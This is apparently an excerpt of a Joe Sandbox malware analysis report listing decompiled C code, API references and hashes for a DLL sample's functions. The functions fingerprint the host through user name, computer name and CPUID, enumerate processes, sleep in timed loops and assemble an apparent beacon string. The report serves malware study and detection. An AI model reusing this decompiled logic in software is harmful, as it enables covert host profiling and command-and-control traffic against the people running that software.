				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x7dd238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E007D168D(_v8 + _v8, _t63);
						}
						HeapFree( *0x7dd238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x007d3c3a
0x007d3c42
0x007d3c48
0x007d3c4b
0x007d3c4e
0x007d3c50
0x007d3c55
0x007d3c55
0x007d3c5b
0x007d3c5d
0x007d3c6a
0x007d3ccb
0x007d3c6c
0x007d3c71
0x007d3c77
0x007d3c7c
0x007d3c8a
0x007d3c8e
0x007d3c9d
0x007d3ca4
0x007d3cab
0x007d3cab
0x007d3cb6
0x007d3cb6
0x007d3c8e
0x007d3c7c
0x007d3ccd
0x007d3cd3
0x007d3cdd
0x007d3cdf
0x007d3ce4
0x007d3cf3
0x007d3cf7
0x007d3d02
0x007d3d09
0x007d3d10
0x007d3d10
0x007d3d1c
0x007d3d1c
0x007d3cf7
0x007d3d25
0x007d3d27
0x007d3d2a
0x007d3d2c
0x007d3d2f
0x007d3d32
0x007d3d3c
0x007d3d40
0x007d3d44

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 007D3C71
RtlAllocateHeap.NTDLL(00000000,?), ref: 007D3C88
GetUserNameW.ADVAPI32(00000000,?), ref: 007D3C95
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,007D59CA), ref: 007D3CB6
GetComputerNameW.KERNEL32(00000000,00000000), ref: 007D3CDD
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 007D3CF1
GetComputerNameW.KERNEL32(00000000,00000000), ref: 007D3CFE
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,007D59CA), ref: 007D3D1C

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: ce9dce1988f2401724741a593dd6f084f31e14432d0d15a2854444ede0977eb8
Instruction ID: 0c3cf44bd1470d3a978dc2b03896a510748c5f1ec60f880b8706de1340d47ebb
Opcode Fuzzy Hash: ce9dce1988f2401724741a593dd6f084f31e14432d0d15a2854444ede0977eb8
Instruction Fuzzy Hash: E8312A71A01209EFDB21DFA9CC81A6EB7F9FB44300F54852AE405E3260E778EE019B25

Uniqueness

Uniqueness Score: -1.00%

Function 007D5408, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E007D5408(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E007D3727(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E007D6EF8(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x007d5415
0x007d5416
0x007d5417
0x007d5418
0x007d5419
0x007d541d
0x007d5424
0x007d5433
0x007d5436
0x007d5439
0x007d5440
0x007d5443
0x007d5446
0x007d5449
0x007d544c
0x007d5457
0x007d5459
0x007d5462
0x007d546a
0x007d546c
0x007d547e
0x007d5488
0x007d548c
0x007d549b
0x007d549f
0x007d54a8
0x007d54b0
0x007d54b0
0x007d54b2
0x007d54b2
0x007d54ba
0x007d54c0
0x007d54c4
0x007d54c4
0x007d54cf

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 007D544F
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 007D5462
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 007D547E

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 007D549B
memcpy.NTDLL(00000000,00000000,0000001C), ref: 007D54A8
NtClose.NTDLL(?), ref: 007D54BA
NtClose.NTDLL(00000000), ref: 007D54C4

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 2a052934fa9307b7bafc56ae2439a7c99b3464c29e7b7e48de8256512e372beb
Instruction ID: cf5deca9d90559a0bc05d5ea32dd3dc4e62507ff0ed7a02cb8bb2ae9dc0ab6fd
Opcode Fuzzy Hash: 2a052934fa9307b7bafc56ae2439a7c99b3464c29e7b7e48de8256512e372beb
Instruction Fuzzy Hash: E12105B2901229FBDF019F95CC859DEBFBDEB08740F108026F904F6261D7799A40DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007D947A, Relevance: 9.1, APIs: 6, Instructions: 60
sleepmemorytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E007D947A(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x7dd238 = _t10;
				if(_t10 != 0) {
					 *0x7dd1a8 = GetTickCount();
					_t12 = E007DA499(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L007DB1C6();
							_t33 = _t14 + _t16;
							_t18 = E007D4384(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E007D707C(_t25) != 0) {
							 *0x7dd260 = 1; // executed
						}
						_t12 = E007D584C(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x007d947a
0x007d9480
0x007d9481
0x007d948d
0x007d9495
0x007d949a
0x007d94aa
0x007d94af
0x007d94b6
0x007d94b8
0x007d94bd
0x007d94c3
0x007d94c9
0x007d94d3
0x007d94d7
0x007d94d9
0x007d94de
0x007d94df
0x007d94e0
0x007d94e5
0x007d94eb
0x007d94f4
0x007d94f5
0x007d94fa
0x007d9500
0x007d950c
0x007d950e
0x007d950e
0x007d9518
0x007d9518
0x007d949c
0x007d949e
0x007d949e
0x007d9522

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,007D80BD,?), ref: 007D948D
GetTickCount.KERNEL32 ref: 007D94A1
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,007D80BD,?), ref: 007D94BD
SwitchToThread.KERNEL32(?,00000001,?,?,?,007D80BD,?), ref: 007D94C3
_aullrem.NTDLL(?,?,00000009,00000000), ref: 007D94E0
Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,007D80BD,?), ref: 007D94FA

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: 917b9bbaa4a6c77315f8bf43f53db5b4c9b688a41c58ede96bed8101997d1b51
Instruction ID: 29aed325114482380b4d62d5a606be363a7e828c69501fb4b2707de443feb2cb
Opcode Fuzzy Hash: 917b9bbaa4a6c77315f8bf43f53db5b4c9b688a41c58ede96bed8101997d1b51
Instruction Fuzzy Hash: 3511A972A44205FFE7219B64EC0EB5A77B8AB44350F10812BFA45D63D1E67CD800C675

Uniqueness

Uniqueness Score: -1.00%

Function 007D9E28, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E007D9E28() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x7dd27c; // 0x2bda5a8
						_t2 = _t9 + 0x7dee54; // 0x73617661
						_push( &_v264);
						if( *0x7dd0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x007d9e33
0x007d9e38
0x007d9e3d
0x007d9e41
0x007d9e4b
0x007d9e7c
0x007d9e52
0x007d9e57
0x007d9e64
0x007d9e6d
0x007d9e84
0x007d9e6f
0x007d9e77
0x00000000
0x007d9e77
0x007d9e85
0x007d9e86
0x00000000
0x007d9e86
0x00000000
0x007d9e80
0x007d9e8c
0x007d9e91

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007D9E38
Process32First.KERNEL32(00000000,?), ref: 007D9E4B
Process32Next.KERNEL32(00000000,?), ref: 007D9E77
FindCloseChangeNotification.KERNELBASE(00000000), ref: 007D9E86

Strings

7}, xrefs: 007D9E28

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID: 7}
API String ID: 3243318325-1518483753
Opcode ID: 13b3d92eb4a1deb00fcaf4e0972df69b70b59dcb20683d6ca38ba4378410e509
Instruction ID: daf059cfab85de7eedd199221214d8bfd9be24cf070a7167347364fffd2bf9dc
Opcode Fuzzy Hash: 13b3d92eb4a1deb00fcaf4e0972df69b70b59dcb20683d6ca38ba4378410e509
Instruction Fuzzy Hash: EEF09633501064A6D721E7B69C49DEB77BCDBC5750F000063FA46C2300EA2CDE4986A5

Uniqueness

Uniqueness Score: -1.00%

Function 007D11FA, Relevance: 33.2, APIs: 22, Instructions: 245
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E007D11FA(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t101;
				signed int _t105;
				char** _t107;
				int _t110;
				signed int _t112;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr _t122;
				intOrPtr _t127;
				int _t131;
				CHAR* _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t144;
				int _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x7dd018; // 0x639b57ef
				asm("bswap eax");
				_t61 =  *0x7dd014; // 0x3a87c8cd
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0x7dd010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x7dd00c; // 0x81762942
				asm("bswap eax");
				_t64 =  *0x7dd27c; // 0x2bda5a8
				_t3 = _t64 + 0x7de633; // 0x74666f73
				_t145 = wsprintfA(_t133, _t3, 3, 0x3d151, _t63, _t62, _t61, _t60,  *0x7dd02c,  *0x7dd004, _t59);
				_t67 = E007D6C9B();
				_t68 =  *0x7dd27c; // 0x2bda5a8
				_t4 = _t68 + 0x7de673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71; // executed
				_t72 = E007D570D(_t135); // executed
				_t134 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0x7dd27c; // 0x2bda5a8
					_t7 = _t127 + 0x7de8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0x7dd238, 0, _v8);
				}
				_t73 = E007D9525();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0x7dd27c; // 0x2bda5a8
					_t11 = _t122 + 0x7de8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0x7dd238, 0, _v8);
				}
				_t147 =  *0x7dd32c; // 0x33b95b0
				_t75 = E007D4511( &E007DD00A, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0x7dd238, _t153, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x7dd238, 0, 0x800); // executed
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x7dd238, _t153, _v20);
						goto L26;
					}
					E007DA47F(GetTickCount());
					_t82 =  *0x7dd32c; // 0x33b95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x7dd32c; // 0x33b95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x7dd32c; // 0x33b95b0
					_t149 = E007D8386(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						RtlFreeHeap( *0x7dd238, _t153, _v8); // executed
						goto L25;
					}
					StrTrimA(_t149, 0x7dc2ac);
					_push(_t149);
					_t94 = E007D41B9();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x7dd238, _t153, _t149);
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E007D4FD8(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E007D48E8();
						L22:
						HeapFree( *0x7dd238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E007D3FF8(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_t112 = E007D393E(_t158, _a4, _a8, _a12); // executed
						_v12 = _t112;
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E007D6EF8(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E007DA6BF(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E007D6EF8(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x007d11fa
0x007d11fa
0x007d11fa
0x007d1205
0x007d120c
0x007d120e
0x007d120e
0x007d121b
0x007d1226
0x007d1229
0x007d122e
0x007d1237
0x007d123a
0x007d123f
0x007d1242
0x007d1247
0x007d124a
0x007d1256
0x007d1263
0x007d1265
0x007d126b
0x007d1270
0x007d127b
0x007d127d
0x007d1280
0x007d1282
0x007d1289
0x007d128f
0x007d1292
0x007d1295
0x007d129a
0x007d12a7
0x007d12a9
0x007d12af
0x007d12b9
0x007d12b9
0x007d12bb
0x007d12c2
0x007d12c5
0x007d12c8
0x007d12cd
0x007d12da
0x007d12dc
0x007d12ea
0x007d12ea
0x007d12ec
0x007d12fa
0x007d12ff
0x007d1303
0x007d1306
0x007d14c9
0x007d14d3
0x007d14dc
0x007d130c
0x007d1318
0x007d1320
0x007d1323
0x007d14bd
0x007d14c7
0x00000000
0x007d14c7
0x007d132f
0x007d1334
0x007d133d
0x007d134e
0x007d1352
0x007d135b
0x007d1361
0x007d1370
0x007d1377
0x007d1380
0x007d1386
0x007d14b1
0x007d14bb
0x00000000
0x007d14bb
0x007d1392
0x007d1398
0x007d1399
0x007d13a0
0x007d13a3
0x007d14a7
0x007d14af
0x00000000
0x007d14af
0x007d13ac
0x007d13b3
0x007d13bb
0x007d13c0
0x007d13c9
0x007d13cf
0x007d13d6
0x007d13dd
0x007d13e0
0x007d14df
0x007d1493
0x007d1493
0x007d1498
0x007d14a3
0x007d14a5
0x00000000
0x007d14a5
0x007d13ea
0x007d13f1
0x007d13f4
0x007d13f9
0x007d1404
0x007d1409
0x007d140c
0x007d1412
0x007d1418
0x007d141e
0x007d1421
0x007d1427
0x007d142a
0x007d142f
0x007d1433
0x007d1433
0x007d143f
0x007d144b
0x007d144f
0x007d1451
0x007d1456
0x007d1458
0x007d145d
0x007d1462
0x007d146f
0x007d1477
0x007d147a
0x007d147a
0x007d1456
0x00000000
0x007d1441
0x007d1445
0x007d147c
0x007d147f
0x007d1488
0x00000000
0x00000000
0x00000000
0x00000000
0x007d1488
0x007d1447
0x00000000
0x007d1447
0x007d143f

APIs

GetTickCount.KERNEL32 ref: 007D120E
wsprintfA.USER32 ref: 007D125E
wsprintfA.USER32 ref: 007D127B
wsprintfA.USER32 ref: 007D12A7
HeapFree.KERNEL32(00000000,?), ref: 007D12B9
wsprintfA.USER32 ref: 007D12DA
HeapFree.KERNEL32(00000000,?), ref: 007D12EA
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 007D1318
GetTickCount.KERNEL32 ref: 007D1329
RtlEnterCriticalSection.NTDLL(033B9570), ref: 007D133D
RtlLeaveCriticalSection.NTDLL(033B9570), ref: 007D135B

Part of subcall function 007D8386: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,007D987D,?,033B95B0), ref: 007D83B1
Part of subcall function 007D8386: lstrlen.KERNEL32(?,?,?,007D987D,?,033B95B0), ref: 007D83B9
Part of subcall function 007D8386: strcpy.NTDLL ref: 007D83D0
Part of subcall function 007D8386: lstrcat.KERNEL32(00000000,?), ref: 007D83DB
Part of subcall function 007D8386: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,007D987D,?,033B95B0), ref: 007D83F8

StrTrimA.SHLWAPI(00000000,007DC2AC,?,033B95B0), ref: 007D1392

Part of subcall function 007D41B9: lstrlen.KERNEL32(033B9978,00000000,00000000,745EC740,007D98A8,00000000), ref: 007D41C9
Part of subcall function 007D41B9: lstrlen.KERNEL32(?), ref: 007D41D1
Part of subcall function 007D41B9: lstrcpy.KERNEL32(00000000,033B9978), ref: 007D41E5
Part of subcall function 007D41B9: lstrcat.KERNEL32(00000000,?), ref: 007D41F0

lstrcpy.KERNEL32(00000000,?), ref: 007D13B3
lstrcpy.KERNEL32(?,?), ref: 007D13BB
lstrcat.KERNEL32(?,?), ref: 007D13C9
lstrcat.KERNEL32(?,00000000), ref: 007D13CF

Part of subcall function 007D4FD8: lstrlen.KERNEL32(?,00000000,007DD330,00000001,007D4231,007DD00C,007DD00C,00000000,00000005,00000000,00000000,?,?,?,007D93A5,007D59DA), ref: 007D4FE1
Part of subcall function 007D4FD8: mbstowcs.NTDLL ref: 007D5008
Part of subcall function 007D4FD8: memset.NTDLL ref: 007D501A

wcstombs.NTDLL ref: 007D1462

Part of subcall function 007D393E: SysAllocString.OLEAUT32(?), ref: 007D397F
Part of subcall function 007D393E: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 007D3A01
Part of subcall function 007D393E: StrStrIW.SHLWAPI(?,006E0069), ref: 007D3A40

Part of subcall function 007D6EF8: RtlFreeHeap.NTDLL(00000000,00000000,007D4499,00000000,?,?,00000000), ref: 007D6F04

HeapFree.KERNEL32(00000000,?,?), ref: 007D14A3
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 007D14AF
RtlFreeHeap.NTDLL(00000000,?,?,033B95B0), ref: 007D14BB
HeapFree.KERNEL32(00000000,?), ref: 007D14C7
RtlFreeHeap.NTDLL(00000000,?), ref: 007D14D3

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 603507560-0
Opcode ID: b5a3eb957e7e8e201c932815dce9ae05f7c547bc6ec4d32d2ad14f08b14c6c84
Instruction ID: 26d91f220ca4d6696a7799a9fe5d662ea17b92ff5a4b517f1d8ce310534ee270
Opcode Fuzzy Hash: b5a3eb957e7e8e201c932815dce9ae05f7c547bc6ec4d32d2ad14f08b14c6c84
Instruction Fuzzy Hash: 39912771901209FFCB21DFA8DC48AAA7BB9FF48350F148066F808E7260D739AD51DB65

Uniqueness

Uniqueness Score: -1.00%

Function 007DAD85, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E007DAD85(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x7d0000;
				_t115 = _t139[3] + 0x7d0000;
				_t131 = _t139[4] + 0x7d0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x7d0000;
				_v16 = _t139[5] + 0x7d0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x7d0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x7dd1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x7dd1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x7dd1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x7dd19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x7dd1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x7dd198; // 0x0
										 *_t102 = _t125;
										 *0x7dd198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x7dd19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x007dad94
0x007dadaa
0x007dadb0
0x007dadb2
0x007dadb7
0x007dadbd
0x007dadc2
0x007dadc5
0x007dadd3
0x007dadda
0x007daddd
